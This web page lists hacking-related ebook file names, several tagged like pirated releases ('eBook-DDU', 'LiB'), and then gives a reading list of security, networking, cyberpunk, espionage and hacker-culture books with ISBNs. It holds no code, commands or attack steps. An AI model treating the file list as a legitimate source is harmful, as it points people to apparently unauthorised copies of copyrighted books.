  51. Hacker Disassembling Uncovered.chm
  52. hacker ethic.pdf
  53. Hacker Linux Uncovered.chm
  54. Hacker Web Exploitation Uncovered.chm
  55. Hacker’S.Delight.chm
  56. hacker-disassembling-uncovered.9781931769228.20035.chm
  57. Hackers Beware.pdf
  58. Hackers Secrets Revealed.pdf
  59. Hackers Secrets.pdf
  60. Hackers, Heroes Of The Computer Revolution.pdf
  61. Hackers_Secrets.pdf
  62. Hacker_s_Guide.pdf
  63. Hacking – Firewalls And Networks How To Hack Into Remote Computers.pdf
  64. Hacking – The Art of Exploitation.chm
  65. Hacking Cisco Routers.pdf
  66. Hacking Exposed – Network Security Secrets & Solutions, 2nd Edition.pdf
  67. Hacking Exposed Network Security Secrets & Solutions, Third Edition ch1.pdf
  68. Hacking For Dummies 1.pdf
  69. Hacking For Dummies 2.pdf
  70. Hacking For Dummies.pdf
  71. Hacking GMail.pdf
  72. Hacking IIS Servers.pdf
  73. Hacking into computer systems – a beginners guide.pdf
  74. Hacking the Code – ASP.NET Web Application Security Cookbook (2004) .chm
  75. hacking the windows registry .pdf
  76. Hacking Windows XP.pdf
  77. Hacking-ebook – CIA-Book-of-Dirty-Tricks1.pdf
  78. Hacking-Hacker’s Guide.pdf
  79. Hacking-Hackers Secrets Revealed.pdf
  80. Hacking-Hugo Cornwall-The Hacker’s Handbook .pdf
  81. Hacking-The Hacker Crackdown.pdf
  82. Hacking.For.Dummies.Access.To.Other.People’s.System.Made.Simple.pdf
  83. Hacking.Guide.V3.1.pdf
  84. Hackproofing Oracle Application Server.pdf
  85. hacks.sfv
  86. Hack_Attacks_Revealed_A_Complete_Reference_With_Custom_Security_Hacking_Toolkit.chm
  87. Hack_IT_Security_Through_Penetration_Testing.chm
  88. Halting.The.Hacker.A.Practical.Guide.To.Computer.Security.chm
  89. How to Crack CD Protections.pdf
  90. John Wiley & Sons – Hacking For Dummies.pdf
  91. John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eBook-DDU.pdf
  92. John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eBook.pdf
  93. John.Wiley.and.Sons.The.Art.of.Intrusion.The.Real.Stories.Behind.the.Exploits.of.Hackers.Intruders.and.Deceivers.Feb.2005.ISBN0764569597.pdf
  94. Jon.Erickson.Hacking.The.Art.Of.Exploitation.No.Starch.Press.2003.chm
  95. linux-server-hacks.pdf
  96. Linux-Server.Hacks-OReilly.pdf
  97. little_black_book_oc_computer_viruses.pdf
  98. mac-os-hacks.chm
  99. McGraw Hill – Web Applications (Hacking Exposed).pdf
  100. McGraw-Hill – Hacking Exposed, 3rd Ed – Hacking Exposed Win2.pdf
  101. McGraw.Hacking.Exposed.Cisco.Networks.chm
  102. McGraw.Hill.HackNotes.Linux.and.Unix.Security.Portable.Reference.eBook-DDU.pdf
  103. McGraw.Hill.HackNotes.Network.Security.Portable.Reference.eB.pdf
  104. McGraw.Hill.HackNotes.Network.Security.Portable.Reference.eBook-DDU.pdf
  105. McGraw.Hill.HackNotes.Web.Security.Portable.Reference.eBook-.pdf
  106. McGraw.Hill.HackNotes.Web.Security.Portable.Reference.eBook-DDU.pdf
  107. McGraw.Hill.HackNotes.Windows.Security.Portable.Reference.eB.pdf
  108. McGraw.Hill.HackNotes.Windows.Security.Portable.Reference.eBook-DDU.pdf
  109. Mind Hacks – Tips & Tricks for Using Your Brain.chm
  110. network-security-hacks.chm
  111. No.Starch.Press.Hacking.The.Art.Of.Exploitation.chm
  112. O’Reilly – Online Investing Hacks.chm
  113. O’Reilly.-.Network.Security.Hacks.chm
  114. O’Reilly.Windows.Server.Hack.chm
  115. O’Reilly.Windows.Server.Hack.rar
  116. online-investing-hacks.chm
  117. OReilly Google Hacks, 1st Edition2003.pdf
  118. OReilly – Flickr Hacks Tips and Tools for Sharing Photos Online (Feb 2006).chm
  119. OReilly – Google Hacks.pdf
  120. Oreilly Access Hacks Apr 2005.chm
  121. Oreilly, Paypal Hacks (2004) Ddu.chm
  122. OReilly,.Digital.Video.Hacks.(2005).DDU.LotB.chm
  123. OReilly,.IRC.Hacks.(2004).DDU.chm
  124. oreilly,.visual.studio.hacks.(2005).ddu.lotb.chm
  125. Oreilly.Amazon.Hacks.eBook.LiB.chm
  126. oreilly.firefox.hacks.ebook-lib.chm
  127. OReilly.Google.Hacks.2nd.Edition.Dec.2004.ISBN0596008570.chm
  128. OReilly.Google.Maps.Hacks.Jan.2006.chm
  129. Oreilly.Linux.Desktop.Hacks.Mar.2005.eBook-LiB.chm
  130. OReilly.Linux.Server.Hacks.Volume.Two.Dec.2005.chm
  131. OReilly.Network.Security.Hacks.chm
  132. OReilly.PayPal.Hacks.Sep.2004.eBook-DDU.chm
  133. OReilly.PC.Hacks.Oct.2004.eBook-DDU.chm
  134. OReilly.Perl.Hacks.Tips.and.Tools.for.Programming.Debugging.and.Surviving.May.2006.chm
  135. OReilly.Skype.Hacks.Tips.and.Tools.for.Cheap.Fun.Innovative.Phone.Service.Dec.2005.chm
  136. OReilly.SQL.Hacks.Nov.2006.chm
  137. OReilly.Statistics.Hacks.May.2006.chm
  138. OReilly.Ubuntu.Hacks.Tips.and.Tools.for.Exploring.Using.and.Tuning.Linux.Jun.2006.chm
  139. OReilly.VoIP.Hacks.Tips.and.Tools.for.Internet.Telephony.Dec.2005.chm
  140. oreilly.windows.xp.hacks.2nd.edition.feb.2005.lib.chm
  141. OReilly.Word.Hacks.Oct.2004.eBook-DDU.chm
  142. OSB.Ethical.Hacking.and.Countermeasures.EC.Council.Exam.312.50.Student.Courseware.eBook-LiB.chm
  143. O_Reilly_-_Windows_XP_Hacks.chm
  144. PC Games – How to Crack CD Protection.pdf
  145. prentice hall – pipkin – halting the hacker- a practical guide to computer security, 2nd edition.chm
  146. Que – UNIX Hints Hacks.chm
  147. Que.Certified.Ethical.Hacker.Exam.Prep.Apr.2006.chm
  148. Security and Hacking – Anti-Hacker Tool Kit Second Edition.chm
  149. SoTayHacker1.0.chm
  150. Spidering Hacks-100 Industrial Strength Tips & Tools 2003.chm
  151. SQL Hacks.chm
  152. SQLInjectionWhitePaper.pdf
  153. Syngress – Hack Proofing Linux (2001).pdf
  154. Syngress – Hack Proofing Your Identity in the Information Age – 2002.pdf
  155. Syngress – Hacking a Terror Network. The Silent Threat of Covert Channels.pdf
  156. Syngress — Hack Proofing Your Wireless Network.pdf
  157. Syngress Hack Proofing Your Identity in the Information Age.pdf
  158. Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU.pdf
  159. Syngress.Hack.the.Stack.Oct.2006.pdf
  160. Syngress.Hacking.a.Terror.Network.Nov.2004.ISBN1928994989.pdf
  161. The Little Black Book Of Computer Virus.pdf
  162. the-database-hackers-handbook-defending-database-servers.9780764578014.25524.chm
  163. The_20Little_20Black_20Book_20of_20Computer_20Viruses.pdf
  164. tivo-hacks.100-industrial-strength-tips-and-tools.pdf
  165. u23_Wiley – Hacking GPS – 2005 – (By Laxxuss).pdf
  166. Websters.New.World.Websters.New.World.Hacker.Dictionary.Sep.2006.pdf
  167. Wiley.Hacking.Firefox.More.Than.150.Hacks.Mods.and.Customizations.Jul.2005.eBook-DDU.pdf
  168. Wiley.Hacking.Google.Maps.and.Google.Earth.Jul.2006.pdf
  169. Wiley.Hacking.GPS.Mar.2005.ISBN0764598805.pdf
  170. Wiley.Lifehacker.Dec.2006.pdf
  171. Wiley.The.Database.Hackers.Handbook.Defending.Database.Servers.chm
  172. Win XP Hacks oreilly 2003.chm
  173. Windows Server Hacks.chm
  174. WinXP SP1 Hack.pdf
  175. Xbox-hack – AIM-2002-008.pdf
  176. Yahoo.Hacks.Oct.2005.chm
  177. Hackers Beware Defending Your Network From The Wiley Hacker.pdf

Do not forget to ensure any legal issue in your own country.

There are some books that hackers and security professionals also use to read and share so, I have listed them as well.

I have tried to pick out books that form part of a common pool of knowledge of the computer underground. Many people ask me what they should read to try to understand what it’s about. This is not meant to be an exhaustive list, just enough to raise your curiosity.

Computer Reference

Administering Usenet News Servers: A Comprehensive Guide to Planning, Building, and Managing Internet and Intranet News Services
ISBN 020141967X, available in paperback

Applied Cryptography (2nd Ed.)
by Bruce Schneier, ISBN 0471117099, available in paperback

Apache, The Definitive Guide, Third Addition
by Ben Laurie, Peter Laurie, ISBN 1565922506, available in paperback

Cisco 12.0 IOS Configuration Fundamentals
ISBN 1578700442, available in paperback.

Core Java 2, Volume 1 Fundamentals (6th Ed.)
by Cay S. Horstmann, Gary Cornell, ISBN 0137669577, available in paperbackThis book is out-of-print, but possibly available through the used bookstore network.

The Complete Freebsd (4th Ed.)
by Greg Lehey, ISBN 1571762469, available in paperback

DNS and BIND (4th Ed.)
by Paul AlbitzCricket Liu, ISBN 1565925122, available in paperback

HTML, Java, CGI, VRML, SGML Web Publishing
by William Robert Stanek, Mark Ketzler, and Steven J. DeRose, ISBN 1575210517, available in paperback.

Instant SQL Programming
by Joe Celko, ISBN 1874416508, available in paperback

Internet Routing Architectures
by Bassam Halabi, ISBN 1562056522, available in hardcover

Java Distributed Computing
by Jim Farley and Mike Loukides, ISBN 1565922069, available in paperback

Managing IP Networks with Cisco Routers
by Scott M. Ballew, ISBN 1565923200, available in paperback

Managing Mail Lists
by O’Reilly, ISBN 156592259X, available in hardcover

Open Vms Operating System Concepts (2nd Ed.)
by David Donald Miller, ISBN 1555581579, available in paperback

Operating System Concepts (5th Ed.) 

by Abraham Silberschatz and Peter Baer Galvin, ISBN 0471364142, available in hardcover

Operating Systems Internals and Principles (4th Ed.)

by William Stallings, ISBN 0138874077, available in hardcover

OSPF: Anatomy of an Internet Routing Protocol
by John Moy, ISBN 0201634724, available in hardcover.

OSPF: Complete Implementation

by John Moy, ISBN 0201634724, available in hardcoverThis book is the companion to the above book.

Solaris Performance Administration: Performance Measurement, Fine Tuning, and Capacity Planning for Releases 2.5.1 and 2.6
by H. Frank Cervone, ISBN 0070117683, available in paperback.

TCP/IP Illustrated Volume One: The Protocols, Two: The Implementation, Three: Tcp for Transactions, Http, Nntp, and the Unix Domain Protocols
by W. Richard Stevens, available in paperback. These are the Authoritative three books on IP.

TCP/IP Network Administration (3rd Ed.)
by Craig Hunt, ISBN 1565923227, available in paperback

Unix in a Nutshell: System V & Solaris 2.0
by Daniel Gilly, ISBN 1565920015, available in paperback

UNIX Shells by Example (3rd Ed.)
by Ellie Quigley, ISBN 0134608666, available in paperback. This item is occasionally unavailable.

Virtual Private Networks (2nd Ed.)
by O’Reilly, ISBN 1565923197, available in hardcover

Windows Sockets Network Programming
by Bob Quinn, Dave Shute (Contributor), David K. Shute, ISBN 0201633728, available in hardcover

top of the page

Computer Security

Building Internet Firewalls (2nd Ed.)
by by Elizabeth D. Zwicky (Author), Simon Cooper (Author), D. Brent Chapman (Author) ISBN 1565921240, available inpaperback

Cisco IOS Network Security
by Cisco Systems, ISBN 1578700574, available in hardbound

Computer Security Handbook (4th Ed.)
by Arthur E. HuttSeymour BosworthDouglas B. Hoyt, ISBN 0471118540, available in paperback

Designing Network Security (2nd Ed.)
ISBN 1578700434, available in hardbound

Information Security Management Handbook (4th Ed, Vol 1)
by Micki Krause and Harold F. Tipton (Used to review for the CISSP test), ISBN 0849399742, available in hardbound

Java Security: Hostile Applets, Holes & Antidotes
by Gary McGraw, Edward FellenEdward Felten, ISBN 047117842X, available in paperback

Practical Unix & Internet Security (3rd Ed.)
by Simson GarfinkelGene Spafford, ISBN 1565921488, available in paperback

Web Security, Privacy and Commerce (2nd Ed.)
by Simson Garfinkel, ISBN 1565922697, available in paperback

Web Security Sourcebook
by Marcus Ranum, Avi Rubin and Dan Geer, ISBN 047118148X, available in paperback

top of the page

Cyber Punk

 

William Gibson


The person who coined the term “Cyberspace” in the phenomenal book Neuromancer. We try and get him at DEF CON each year, if we could only get past his agent!

Neuromancer, ISBN 0441569595, available in paperback or hardcover [ISBN 0441000681]
Count Zero, ISBN 0441117732, available in paperback
Mona Lisa Overdrive, ISBN 0553281747, available in paperback or Special Order Edition [ISBN 999271641X]
Burning Chrome, ISBN 0441089348, available in paperback
The Difference Engine, ISBN 055329461X, available in paperback
Virtual Light, ISBN 0553566067, available in paperback
Idoru, ISBN 0425158640, available in paperback or on audio cassette [ISBN 0399142258]

Bruce Sterling


Islands in the Net, ISBN 0441374239, available in paperback
Mirror Shades, ISBN 0441533825, available in paperback
Heavy Weather, ISBN B000002AGE, available in paperback
Schismatrix Plus: Includes Schismatrix and Selected Stories from Crystal Express, ISBN 0441003702, available inpaperback.

Phillip K. Dick


Blade Runner

Do Androids Dream of Electric Sheep? is in trade paperback [ISBN 0345350472], paperback [ISBN 0345404475], oraudio cassette [ISBN 1570420521]
Retrofitting Blade Runner: Issues in Ridley Scott’s ‘Blade Runner’ and Philip K. Dick’s ‘Do Androids Dream of Electric Sheep?’, ISBN 0879725109, available in paperback and hard to find used
Future Noir: The Making of Blade Runner, ISBN 0061053147, available in paperback, and quite cool.

Neal Stephenson


What can I say? All three of these books are excellent all for different reasons.

Snowcrash, ISBN 0553562614, available in paperback.
The Diamond Age, ISBN 0553573314, available in paperback, or the more elite out of print version.
Interface, ISBN 0553572407, available in paperback, and written under Stephenson’s pen-name, Stephen Bury.
Zodiac: The Eco-Thriller, ISBN 0553573861, available in paperback. Not quite cyberpunk, it was Neal’s first book.

Vernor Vinge


You will notice similarities between the excellent True Names and Neuromancer.

True Names and Other Dangers, ISBN 0671653636, available in paperback. This book is out-of-print, but possibly available through the used bookstore network.
True Names and The Opening of the Cyberspace Frontier, ISBN 0312862075, available in hardcover.

John Brunner


This is one of the books that started it all. A bit before its time.

The Shockwave Rider, ISBN 0345324315, available in paperback.
Stand on Zanzibar, ASIN 0837604389, available in paperback and out of stock.

F.E. Jones


Colossus, ISBN 0425032299, available in paperback. This book is out-of-print, but possibly available through the used bookstore network. 
The Fall of Colossus, ISBN 0399112820, available in paperback. This book is out-of-print, but possibly available through the used bookstore network.
Colossus and the Crab, ISBN 0425043274, available in paperback. This book is out-of-print, but possibly available through the used bookstore network.
Colossus Trilogy: A Twenty Fifth Anniversary Omnibus Edition/Colossus, Fall of Colossus and Colossus and the Crab, ISBN 9991250271, available in paperback. This book is out-of-print, but possibly available through the used bookstore network.
Colossus the Forbin Project (The Movie) is in VHS Format [ISBN 6300987531]

Mel Odom


Lethal Interface, ISBN 0451451546, available in paperback.

George Orwell


Nineteen Eighty Four is in trade paperback [ISBN 0451524934], paperback [ISBN 0452262933], hardbound [ISBN 0151660387] and old hardback [ISBN 0899663680]

William C. Dietz


Legion of the Damned, ISBN 0441480403, available in paperback.
Bodyguard, ISBN 044100105X, available in paperback.

Aldous Leonard Huxley


Brave New World, ISBN 1556510799, available in paperbackThis book is out-of-print, but possibly available through the used bookstore network.
Brave New World Revisited, ISBN 0060809841, available in paperback.

Frederick Pohl


Man Plus, ISBN 067187618X, available in paperback This book is out-of-print, but possibly available through the used bookstore network.
Mars Plus, ISBN 0671876651, available in paperback or hardcover [ISBN 0671876058]

top of the page

A peek behind the curtains…

Corporate Espionage: What It Is, Why It Is Happening in Your Company, What You Must Do About It
by Ira Winkler, ISBN 0761508406, available in paperback

Information Warfare: Chaos on the Electronic Superhighway
by Winn Schwartau, ISBN 1560251328, available in hardcover

Spy Catcher: The Candid Autobiography of a Senior Intelligence Officer
by Peter Wright, ISBN 0670820555, available in hardcover This book is out-of-print, but possibly available through the used bookstore network.

The Spy Catcher Trial: The Scandal Behind the #1 Best Seller
by Malcolm Turnbull, ISBN 0881624225, available in hardcover. This book is out-of-print, but possibly available through the used bookstore network.

Skunk Works: A Personal Memoir of My Years at Lockheed
by Ben R. Rich, Leo Janosy, ISBN 0316743003, available in paperback

Inside the Cia: Revealing the Secrets of the World’s Most Powerful Spy Agency

by Ronald Kessler, ISBN 067173458X, available in paperback

The FBI: Inside the World’s Most Powerful Law Enforcement Agency

by Ronald Kessler, ISBN 067178658X, available in paperback

The Puzzle Palace: A Report on America’s Most Secret Agency

by James Bamford, ISBN 0140067485, available in paperback

Mossad: Israel’s Secret Intelligence Service
by Dennis Eisenberg, ISBN , available in paperback This book is out-of-print, but possibly available through the used bookstore network.

A Man Called Intrepid: The Secret Warby

by William Stevenson, ISBN 0451158989, available in paperback. This book is out-of-print, but possibly available through the used bookstore network.

Inside Cia’s Private World: Declassified Articles from the Agency’s Internal Journal, 1955-1992 
by H. Bradford Westerfield (Editor), ISBN 0300072643, available in paperback

A Century of Spies: Intelligence in the Twentieth Century

by Jeffrey T. Richelson, ISBN 019511390X, available in paperback

Che Guevara and the FBI
by Ratner, ASIN 1875284761, available in paperback

Privacy on the Line: The Politics of Wiretapping and Encryption
by Whitfield Diffie, Susan Landau, ISBN 0262041677, available in hardcover

Friendly Spies: How America’s Allies Are Using Economic Espionage to Steal Our Secrets
by Peter Schweizer, ISBN 0871134977, available in hardcover

War by Other Means:  Economic Espionage in America
by John J. Fialka, ISBN 0393040143, available in hardcover

Competitive Intelligence: How to Gather, Analyse, and Use Information to Move Your Business to the Top
by Larry Kahaner, ISBN 0684844044, available in paperback

Friendly Spies: How America’s Allies Are Using Economic Espionage to Steal Our Secrets
by Peter Schweizer, ISBN 0871134977, available in hardcover. This book is out-of-print, but possibly available through the used bookstore network.

top of the page

Unconventional Information

How to Investigate Your Friends, Enemies, & Lovers
by Trent Sands & John Q. Newman, ISBN 1568661436, available in paperback

Credit Power: Rebuild your credit in 90 days or less!
by John Q. Newman, ISBN 1568661312, available in paperback

Privacy Power: Protecting Your Personal Privacy in the Digital Age
by Trent Sands, ISBN 1568661118, available in paperback

The Underground Database, ISBN 156866043X, available in paperback

Level 4 Virus Hunters of the CDC
by Joseph B. McCormick, MD. & Susan Fisher-Hoch, MD, ISBN 1570362777, available in paperback

The Hot Zone
by Richard Preston, ISBN 0385479565, available in paperback. This book is out-of-print, but possibly available through the used bookstore network.

Smart Casino Gambling
by Olaf Vancura, Ph.D., ISBN 1568664249, available in paperback

Cheating and Advantage Play at Blackjack
by Dustin D. Marks, ISBN 1568660715, available in paperback

Cheating at Blackjack Squared
by Dustin D. Marks, ISBN 1568660731, available in paperback

The Ultimate Scanner
by Bill Cheek, ISBN 1568660588, available in paperback

Radio Monitoring: The How-to Guide
by T.J. Arey, N2EI, ASIN 1568661010, available in paperback

Scanner Mods and Antennas
by Jerry Pickard, ISBN 1568661207, available in paperback. This book is out-of-print, but possibly available through the used bookstore network.

Scanners & Secret Frequencies
by Henry L. Eisenson, ASIN 1568660383, available in paperback

TravelScan
by Henery & Eric Eisenson, ISBN 1568660847, available in paperback

Smart Drugs and Nutrients: How to Improve Your Memory and Increase Your Intelligence Using the Latest Discoveries in Neuroscience
by Ward Dean, John Morgenthaler, ISBN 0962741892, available in paperback

Smart Drugs II : The Next Generation: New Drugs and Nutrients to Improve Your Memory and Increase Your Intelligence
by Ward Dean, John Morgenthaler, and Steven William Fowkes, ISBN 0962741876, available in paperback

Mega Brain Power: Transform Your Life With Mind Machines and Brain Nutrients
by Michael Hutchison, ISBN 1562827707, available in paperback

Smart Card Developer’s Kit
by Scott B. Guthery, Timothy M. Jurgensen, ISBN 1578700272, available in paperback

Acquiring New Id: How to Easily Use the Latest Computer Technology to Drop Out, Start Over, and Get on With Your Life
by Ragnar Benson, ISBN 0873648943, available in paperback

The Modern Identity Changer: How to Create a New Identity for Privacy and Personal Freedom
by Sheldon Charrett, ISBN 087364946X, available in paperback

Acquiring New Id: How to Easily Use the Latest Computer Technology to Drop Out, Start Over, and Get on With Your Life
by Ragnar Benson, ISBN 0873648943, available in paperback

The Modern Identity Changer: How to Create a New Identity for Privacy and Personal Freedom
by Sheldon Charrett, ISBN 087364946X, available in paperback

top of the page

Underground Culture

Approaching Zero: The Extraordinary Underworld of Hackers, Phreakers, Virus Writers, and Keyboard Criminals
by Paul Mungo and Bryan Clough, ISBN 0679409386, available in paperback. This book is out-of print, but possibly available through the used bookstore network.

At Large: The Strange Case of the World’s Biggest Internet Invasion
by David Freedman and Charles Mann, ISBN 0684824647, available in hardcover

The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage
by Cliff Stoll, ISBN 0671726889, available in paperback

Cyberpunk: Outlaws and Hackers on the Computer Frontier
by Katie Halfner and John Markhoff, ISBN 0684818620, available in paperback

The Cyberthief and the Samurai
by Jeff Goodell, ISBN 0440222052, available in paperback

The Fugitive Game: Online With Kevin Mitnick
by Jonathan Littman, ISBN 0316528692, available in paperback

The Hacker Crackdown: Law and Disorder on the Electronic Frontier
by Bruce Sterling, ISBN 055356370X, available in paperback

Hackers – Heroes of the Computer Revolution
by Steven Levy, ISBN 0385312105, available in paperback, or the older hard to find hardback

Masters of Deception: The Gang That Ruled Cyberspace
by Michele Slatalla, Joshua Quittner, ISBN 0060926945, available in paperback

Out of the Inner Circle: The True Story of a Computer Intruder Capable of Cracking the Nation’s Most Secure Computer Systems
by Bill Landreth is Hard to find, harder to find, and very hard to find.

Takedown: The Pursuit and Capture of Kevin Mitnick, America’s Most Wanted Computer Outlaw-By the Man Who Did It
by John Markhoff and Tsutomu Shimomura, ISBN 0786889136, available in paperback

The Watchman: The Twisted Life and Crimes of Serial Hacker Kevin Poulsen
by Jonathan Littman, ISBN , available in hardcover

Where Wizards Stay Up Late: The Origins of the Internet
by Katie Hafner, Matthew Lyon, ISBN 0684832674, available in paperback

 

Be safe and order these books legally and if anyone violates this information then he/ she must be responsible for that.